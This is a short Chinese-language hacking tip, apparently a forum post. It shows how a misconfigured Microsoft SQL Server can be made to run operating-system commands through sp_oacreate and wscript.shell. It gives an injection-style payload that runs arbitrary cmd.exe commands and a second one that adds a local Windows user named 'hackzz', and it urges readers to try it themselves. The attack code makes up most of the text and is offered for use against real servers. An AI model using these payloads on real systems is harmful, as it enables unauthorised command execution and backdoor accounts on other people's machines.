先声明,以下代码不是利用BUG,而是该管理员的设置失误造成的,几率不大。

DECLARE @s int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],null,[cmd.exe /c 命令] --

这个就是设置失误,我们利用以上代码可以执行系统命令。

加入我们想加一个用户进去。

就如下:

DECLARE @s int EXEC sp_oacreate [wscript.shell],@s out EXEC sp_oamethod @s,[run],null,[cmd.exe /c net user hackzz /add] --

大家发挥吧,几率不大。